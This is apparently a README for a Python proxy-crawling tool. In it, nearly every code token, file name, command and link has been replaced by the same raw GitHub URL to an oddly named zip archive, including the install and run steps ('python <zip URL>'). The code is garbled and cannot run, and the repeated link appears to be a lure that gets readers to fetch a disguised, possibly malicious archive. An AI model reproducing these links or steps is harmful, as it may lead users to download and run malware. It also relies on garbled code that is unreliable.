A tiny tool for crawling, assessing, storing some useful proxies.中文版
Install mysql:
pip install pymysql requests
Modify db connection information in https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip.
# crawl, assess and store proxies
python https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip
# assess proxies quality in db periodically.
python https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zipPlease first construct your ip pool.
Crawl github homepage data:
# visit database to get all proxies
ip_list = []
try:
https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip('SELECT content FROM %s' % https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip)
result = https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip()
for i in result:
https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip(i[0])
except Exception as e:
print e
finally:
https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip()
https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip()
# use this proxies to crawl website
for i in ip_list:
proxy = {'http': 'http://'+i}
url = "https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip"
r = https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip(url, proxies=proxy, timeout=4)
print https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zipMore detail in https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip。
https://raw.githubusercontent.com/walker1103/Proxy/master/images/Software_pretubercular.zip